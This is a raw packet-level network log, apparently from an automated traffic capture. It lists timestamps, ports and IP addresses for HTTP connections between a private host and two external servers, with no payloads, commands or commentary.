Jul 2, 2024 00:05:08.380209923 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380219936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380234957 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380239010 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380239010 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380264997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380278111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380378008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380389929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380398989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380409956 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380419970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380430937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380440950 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380445004 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380450964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380462885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380472898 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380479097 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380479097 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380491972 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380500078 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380521059 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380650043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380661964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380671978 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380681992 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380692959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380701065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380703926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380713940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380726099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380727053 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380743027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380750895 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380750895 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380753040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380763054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380773067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380781889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380793095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380796909 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380803108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380814075 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380820990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380825043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380842924 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380861998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380893946 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380894899 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381230116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381241083 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381251097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381261110 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381270885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381282091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381283998 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381292105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381302118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381311893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381314993 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381321907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381336927 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381344080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381344080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381346941 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381359100 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381366014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381369114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381380081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381390095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381400108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381402016 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381402016 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381409883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381421089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381431103 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381438971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381442070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381452084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381462097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381474972 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.381495953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381530046 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381810904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381822109 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381831884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381836891 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381846905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381858110 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381867886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381875992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381875992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381876945 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381890059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381901026 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381911993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.381927013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381927013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381961107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.381969929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381982088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.381992102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382002115 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382011890 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382021904 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382028103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382031918 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382049084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382060051 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382070065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382070065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382077932 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382087946 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382098913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382102966 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382110119 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382121086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382126093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382132053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382148027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382158995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382159948 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382159948 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382169008 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382178068 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382194042 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382194996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382205963 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382211924 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382246971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382246971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382747889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382756948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382766962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382776976 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382786989 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382797003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382807970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382808924 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382817984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382827044 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382834911 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382836103 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382841110 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382853031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382863045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382872105 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382873058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382884026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382894993 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.382905006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382905006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382905006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382915020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382925034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382935047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382940054 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.382945061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382955074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382966042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382967949 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.382977009 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.382982016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.382992029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.383004904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.383008957 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.383016109 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.383021116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.383049011 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.383069038 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.383397102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.383411884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.383421898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.383433104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383445024 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383455038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383466005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383476019 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383481979 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.383481979 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.383486032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383497000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383505106 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383505106 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383507013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383521080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383522987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383536100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383544922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383553982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383564949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383570910 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383574963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383584976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383594990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383605957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383606911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383615971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383618116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383618116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383626938 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383636951 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383641958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383646965 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383658886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383667946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.383677006 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383704901 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.383714914 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384082079 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384093046 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384104013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384114027 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384124041 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384131908 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384136915 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384155035 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384155989 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384166002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384176970 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384186983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384196043 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384196043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384207964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384222031 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384232998 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384232998 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384232998 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384243011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384253979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384263992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384264946 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384280920 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384339094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384783030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384793997 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384804010 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384814978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384824991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384829044 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384836912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384855032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384860992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384860992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384865999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.384876966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384886026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384895086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384896040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384906054 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384912014 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384923935 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384933949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384943962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384946108 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384948969 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.384953976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384962082 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384962082 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384967089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384977102 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384989977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.384993076 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.384998083 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385010958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385014057 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385024071 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385034084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385044098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385052919 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385056019 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385056019 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385063887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385072947 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385077953 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385083914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385087967 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385094881 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385104895 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385116100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385122061 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385126114 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385135889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385139942 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385147095 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.385181904 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.385181904 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.386230946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386241913 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386251926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386261940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386271954 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386282921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386292934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.386301994 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.386305094 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.386305094 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.386317968 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.386348009 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.386348963 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.408025980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408046007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408055067 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408143997 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408149004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408164978 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408175945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408185959 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408199072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408236027 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408246994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408253908 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408260107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408271074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408296108 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408307076 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408333063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408344984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408416986 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408432961 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408443928 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408493996 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408579111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408590078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408600092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408610106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408622026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408622026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408647060 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408655882 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.408659935 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.408673048 CEST	49716	80	192.168.2.6	77.105.133.27
